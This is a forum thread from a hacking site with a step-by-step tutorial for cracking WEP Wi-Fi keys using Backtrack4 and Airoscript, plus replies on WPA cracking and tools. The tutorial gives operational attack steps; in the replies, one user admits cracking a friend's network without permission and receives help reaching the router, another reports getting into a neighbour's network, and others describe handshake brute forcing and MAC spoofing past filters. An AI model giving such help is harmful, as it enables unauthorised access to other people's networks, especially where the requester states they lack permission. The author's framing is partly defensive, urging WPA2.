EvilZone
Hacking and Security => Tutorials => : iTpHo3NiX November 26, 2010, 06:35:30 AM
-
///////////////////////////////////////////////////////////////////////////////////////
Title: Hacking WEP with Backtrack4 Final and Airoscript
Paper by: iTpHo3NiX
///////////////////////////////////////////////////////////////////////////////////////
NOTE
When cracking the network from the screenshots, I had permission from my neighbor to pen test their wireless encryption and to write this paper. It is illegal to hack wireless networks without encryption, however if you would like to help secure your neighbors network (as I did and help him set up a MAC filter after this with a WPA2 encryption). Then take a look and show them this. Also hopefully this will also educate you in wireless security.
Method
The simplest way (and a good way to show potential customers how easy it is to actually hack their wireless networks) to hack a WEP encrypted network is using Backtrack4 Final with Airoscript. Airoscript utilizes the aircrack-ng suite to automate WEP/WPA hacking (although WPA, best thing to do is use it to capture the handshake file, go offsite and use John the Ripper to bruteforce, or cowpatty to run a dictionary attack against the handshake file).
Devices Used
- HP G60 Laptop (Wireless is broadcomm and not really supported with aircrack)
- Linksys WUSB54GC USB Wireless Adapter (very good for wifi penetration)
- Backtrack4 Final Live DVD
Hint
With the final release of Backtrack4 there seems to be an error with Airoscript (just a very slight one) that requires you to navigate to the tmp directory after scan and change the extention of dump-01.cvs to dump-01.txt for airoscript to recognize the dump file to select which network you would like to attack.
The Process
Step One
Open the KDE Start Menu (after loading the desktop using startx) and navigate to "Backtrack-->Raido Network Analysis-->80211-->Cracking-->Airoscript"
(http://i51.tinypic.com/feq8op.jpg)
Step Two
Select your screen resolution (I chose 4)
Step Three
Select your wireless device. In most cases its wlan0, however since I'm using my Linksys WUSB54GC its going to be wlan1 and when prompted to put device into monitor mode, select "y" for yes.
(http://i56.tinypic.com/2lmt9qr.jpg)
Step Four
Now you are at the main Airoscript page to select your options. Now normally option 9 which will go through the first three steps is not working out of the box with the final live cd (unless updated to the latest airoscript and the latest aircrack-ng suite) so we are manually going to go through the steps (however its still just as simple) So lets select option 1 to scan.
(http://i56.tinypic.com/1zdryih.jpg)
Step Five
The next page asks you if you would like to apply a filter, since this is a paper on WEP cracking then I am going to select a filter for WEP (option 3) then to select whether you want it to scan on a specific channel or to scan all channels (via Channle Hopping or option 1)
(http://i56.tinypic.com/102kpiw.jpg)
This will open up a new window that is now scanning for targets
(http://i52.tinypic.com/30aqo0j.jpg)
Step Six
Once you've picked up a few networks and have a target you would like to attack (I would note the BSSID and the ESSID with multiple options so you go after ther proper network. Close the scanning window. Now as I stated before unless you have an updated Airoscript/aircrack-ng you will need to go to the temp folder and rename the dump-01.cvs to dump-01.txt To do this simply open Konqueror (right next to the KDE start menu) Click on "Home Folder" you will be in /root and then you will want to go up a folder to just / go into the tmp folder then go into the tmp.RANDOMCHARACTOR folder right click on dump-01.cvs and click rename, then change the extention to dump-01.txt and you can now close Konqueror and continue with Airoscript.
Step Seven
Now we select option 2 to simply select our target then you have a numbered list to select which network you would like to attack
(http://i55.tinypic.com/a3jk0o.jpg)
Step Eight
Now I choose option 1 to select the associated client
(http://i53.tinypic.com/2vk0yva.jpg)
Step Nine
Now we go for the attack so choose option 3, now this can vary for everyone, I personally choose option 1 which is a Fake authorization without user input (no need to select packets, a more automated attack)
(http://i56.tinypic.com/fo3vrq.jpg)
Which will open up the following windows
(http://i54.tinypic.com/qpicep.jpg)
Now I also like to run another attack at the same time, so select option 3 again, however this time I choose option 7 which is an ARP Replay which is again automatic so no user interaction.
Now its a waiting game and you will be having a window like this
(http://i56.tinypic.com/24m9n5k.jpg)
Now this is just personal preference, you can start the cracking as soon as you get at least 1 ACK, however I like to wait until I get at least 100,000+ ACKs (usually 200,000+)
Step 10
Now its time for the actual cracking (option 4) So you select option 4, then option 1 at the following screen for a PTW crack and soon you will have the WEP encryption key like this
(http://i55.tinypic.com/f2vnr5.jpg)
Tutorial by iTpHo3NiX of EvilZone.org This is for educational purposes ONLY and is not to be abused. Hopefully this will pursued people to change their wireless configuration to run a MAC filter with WPA2 to help their internet to not be stolen.
-
i know its illegal to hack to a network n use it without there permissions..
But i hacked one of my friends wep networks.we had a bet for 50$..the problem is that when i connect..it is showing limited connectivity. when i looked upon the status..the default gateway appears to b 0.0.0.0..
so i thnk its not connected to the Router(it also shows unidentified network)..Please help me..
How to find the ip adress of the router..i can no way acess his computer or router...
i used bactrack to find WEP Key..
-
i know its illegal to hack to a network n use it without there permissions..
But i hacked one of my friends wep networks.we had a bet for 50$..the problem is that when i connect..it is showing limited connectivity. when i looked upon the status..the default gateway appears to b 0.0.0.0..
so i thnk its not connected to the Router(it also shows unidentified network)..Please help me..
How to find the ip adress of the router..i can no way acess his computer or router...
i used bactrack to find WEP Key..
Tried the default ones? :P 10.0.0.1 | 192.168.0.1
If those does not work, do a range scan on 10.0. and 192.168. and you should get something.
-
This is one HELL of a tut man! Time to hack into my own wifi network. Quick question though. Could this be done from VMware? I have mine set to share my laptops network and it's never asked for a password eventhough Im getting Internet from it and it shows up when I scan. Would I have to disconnect my laptop from the network first?
-
This is one HELL of a tut man! Time to hack into my own wifi network. Quick question though. Could this be done from VMware? I have mine set to share my laptops network and it's never asked for a password eventhough Im getting Internet from it and it shows up when I scan. Would I have to disconnect my laptop from the network first?
It should work from a VM. I know that VirtualBox puts the NIC in monitor mode to create a virtual card, I'm not so sure how VMware does it.
Really nice tut. I should get that USB wifi adapter, my stupid card doesn't support monitor/promiscuous without finding some old Linux drivers.
-
Yeah I meant virtualbox. I hate autocorrect sometimes.
-
It should work from a VM. I know that VirtualBox puts the NIC in monitor mode to create a virtual card, I'm not so sure how VMware does it.
Really nice tut. I should get that USB wifi adapter, my stupid card doesn't support monitor/promiscuous without finding some old Linux drivers.
http://www.newegg.com/Product/Product.aspx?Item=N82E16833124187&nm_mc=OTC-Froogle&cm_mmc=OTC-Froogle-_-Network+-+Wireless+Adapters-_-Linksys-_-33124187 (http://www.newegg.com/Product/Product.aspx?Item=N82E16833124187&nm_mc=OTC-Froogle&cm_mmc=OTC-Froogle-_-Network+-+Wireless+Adapters-_-Linksys-_-33124187)
;-) I love my card, works like a champ
-
u copy/paste it
try to put the source next time ;)
http://myhackingway.blogspot.com/2011/02/hacking-wep-with-backtrack4-final-and.html (http://myhackingway.blogspot.com/2011/02/hacking-wep-with-backtrack4-final-and.html)
btw nice tut
-
u copy/paste it
try to put the source next time ;)
http://myhackingway.blogspot.com/2011/02/hacking-wep-with-backtrack4-final-and.html (http://myhackingway.blogspot.com/2011/02/hacking-wep-with-backtrack4-final-and.html)
btw nice tut
I highly doubt that.
Hacking WEP with Backtrack4 Final and Airoscript
« on: November 26, 2010, 06:35:30 am »
Saturday, February 12, 2011
Hacking WEP with Backtrack4 Final and Airoscript
-
Lol I copy and pasted my own tut lol. I even posted this on the OLD evilzone!
http://evilzone.org/archive/new/tutorials/hacking-wep-with-backtrack-4-final-and-airoscript/ (http://evilzone.org/archive/new/tutorials/hacking-wep-with-backtrack-4-final-and-airoscript/)
Hacking WEP with Backtrack 4 Final and Airoscript
« on: March 31, 2010, 04:12:13 am »
I posted that almost a year ago. They copy and pasted off of me :P
So thank you try again
-
I shall try it later today (If my backtrack live USB still works). This and easy tut.
-
Can anyone give an updated source to download backtrack4 with airoscript because the links don't work and I could not find it when I searched with Google.
-
Use BackTrack5 instead. You can get it here: http://www.backtrack-linux.org/downloads/ (http://www.backtrack-linux.org/downloads/)
-
Why dont do it more easy(Gerix is a part of Backtrack 4-5):
(http://4.bp.blogspot.com/-DfJAgCGWeHo/TdqQAohtQiI/AAAAAAAAAME/HmCVwktdCR8/s1600/STEP%2B8.JPG)
-
Why dont do it more easy(Gerix is a part of Backtrack 4-5):
(http://4.bp.blogspot.com/-DfJAgCGWeHo/TdqQAohtQiI/AAAAAAAAAME/HmCVwktdCR8/s1600/STEP%2B8.JPG)
Come on, don't encourage click n hack software. Its just gay
-
Come on, don't encourage click n hack software. Its just gay
mehehe, cheat engine in toolbar says enough ;)
-
@ande
well its a best choise when your laptop baterry is limited on 45 min and you must keep your laptop on a windows to hack your neighbour :)
But who wana know more about it there is Wireless Lan Security Megaprime serial on security tube by vivek ;)
-
mehehe, cheat engine in toolbar says enough ;)
not my screen,type gerix in search pictures :P
-
Sorry for probably being an entire n00b, but I use backtrack 5 and I cant find the tool.
[edit] Nevermind, found out how.
For those who wonder how:
1. Download airoscript from the airoscript google site
2. Navigate to where the .tar.gz is and use tar to unpack it
3. Navigate (using shell) to the unpacked folder and type "make"
Now you can type airoscript in shell to start it.
-
Worked fine but, will this work on WPA and WPA2?
-
Cracking WPA is whole different procedure - very hard. Not talking about WPE2...
-
Cracking WPA is whole different procedure - very hard. Not talking about WPE2...
Only way doing it is by brute force iirc?
-
Only way doing it is by brute force iirc?
I guess yeah, brute forcing is the only method. I don't think there are any crypto-attacks on AES that are higher than 128-bit. I guess one could do a generic bruteforce (ssid + key). However, I've also heard of forcing the client to reinitiate its session, capturing the pre-shared key, and bruteforcing that. I'm definitely not an expert on the subject, but I haven't really heard of anything other than brute force methods, although I have heard of different vectors of which to brute force.
EDIT: This was in reference to cracking WPA/WPA2 networks.
-
aircrack-ng (http://www.aircrack-ng.org/) can can crack WPA using pre-shared key (PSK).
More information (http://www.aircrack-ng.org/doku.php?id=aircrack-ng).
-
Only way doing it is by brute force iirc?
isn't dictionary attack work sometimes....?
-
isn't dictionary attack work sometimes....?
That would still be bruteforce
-
isn't dictionary attack work sometimes....?
A dictionary attack won't work for most things. You are just hoping your prey is stupid enough to have a very basic password.
Also, for the whole mac address security thing...not that secure. Pretty simple to get around actually. You can sniff out mac addresses on a wifi network, then you can spoof your mac address. However most people won't do this, so it is a good step up.
-
hmmmm i really cant find aeroscript link to download it.... i use backtrack 5 and i have aircrack which is same even better than aeroscript but problem is that i cant find and good turtorial for it.
or mb i can but my problem is that i cant turn off mon0!
can someone help?
-
hmmmm i really cant find aeroscript link to download it.... i use backtrack 5 and i have aircrack which is same even better than aeroscript but problem is that i cant find and good turtorial for it.
or mb i can but my problem is that i cant turn off mon0!
can someone help?
Even though it would be infinitely easier for me to tell you the command, I cannot cope mentally with the idea of giving a handout for something like this. I'll point you in the right direction though. Look in the linux man-pages about how to use "ifconfig"
Just a side note to all the other new guys, learn how to use your respective operating systems before you attempt any kind of hacking. What good is having a bicycle if you don't know how to ride it? Same idea here. Also, aeroscript is fantastic. I'm an extremely huge fan of mdk3.
-
ty very much ;)
i did everything u said to me and now i can access to WEP my neighbor :)
i learn fast. sorry for my mb nooby question to u but sometimes i really need a help
p.s. sorry for my bad English :-[
-
Is there a tutorial on this on video format? and what program should i download to do this, any links will be appreciated and I know this is illegal I'm not using it for the wrong purpose :D Pls and thank you
-
Crack WEP:
http://lifehacker.com/5305094/how-to-crack-a-wi+fi-networks-wep-password-with-backtrack
Crack WPA:
http://lifehacker.com/5873407/how-to-crack-a-wi+fi-networks-wpa-password-with-reaver
Videos:
http://www.securitytube.net/
Videos are fun to watch but reading about the subject, either it be an book on cracking WEP passwords or an article about sql injection, will help in your learning process. Take it from someone who's been there before.
-
Come on, don't encourage click n hack software. Its just gay
Airoscript is pretty much click n hack, just not click just enter a few numbers and press enter :P
Yes there is Gerix as well as other GUI front-ends for aircrack-ng and I've used most of them, however I find airoscript easier to use as well as simple, yet effective.
Also for those of you who WANT airoscript its not that hard...
svn co http://trac.aircrack-ng.org/svn/trunk/ aircrack-ng
It will download the latest aircrack, as well as airoscript which is in the scripts directory or just google...
http://code.google.com/p/airoscript/
-
Airoscript is pretty much click n hack, just not click just enter a few numbers and press enter :P
As much as I agree with you on this, writing your own tools is not a simple task to undertake. I do think that in the name of research, I would recommend someone to use these tools to understand the attacks and how they work, and from there start writing their own code. As we all know, the aircrack suite as a whole actually takes some thought and planning to perform an attack. There are more noob friendly tools for cracking WEP...for example, the ultimate tool in click n' hack softwarez...wesside-ng.
-
As much as I agree with you on this, writing your own tools is not a simple task to undertake. I do think that in the name of research, I would recommend someone to use these tools to understand the attacks and how they work, and from there start writing their own code. As we all know, the aircrack suite as a whole actually takes some thought and planning to perform an attack. There are more noob friendly tools for cracking WEP...for example, the ultimate tool in click n' hack softwarez...wesside-ng.
Wesside-ng is an auto-magic tool which incorporates a number of techniques to seamlessly obtain a WEP key in minutes. It first identifies a network, then proceeds to associate with it, obtain PRGA (pseudo random generation algorithm) xor data, determine the network IP scheme, reinject ARP requests and finally determine the WEP key. All this is done without your intervention.
lol you do have a point there :P But the GUIz man, teh guiz!!
http://code.google.com/p/aircrackgui-m4/
lol tbh I've never used a gui for aircrack, ever since backtrack 3 beta I've used airoscript and back when I was using backtrack 2 I did it manually.
HOWEVER, my intention when I wrote up this paper (like back in 2009-2010) was to show the vulnerabilities in WEP security. The point was to show that by pressing a few numbers, anyone can hack their WEP network. Then once on their network the damage that could be done. I do believe that people should know what the commands of the aircrack suite, but honestly I havent used it by its self in so long, all it takes is for me to run airoscript.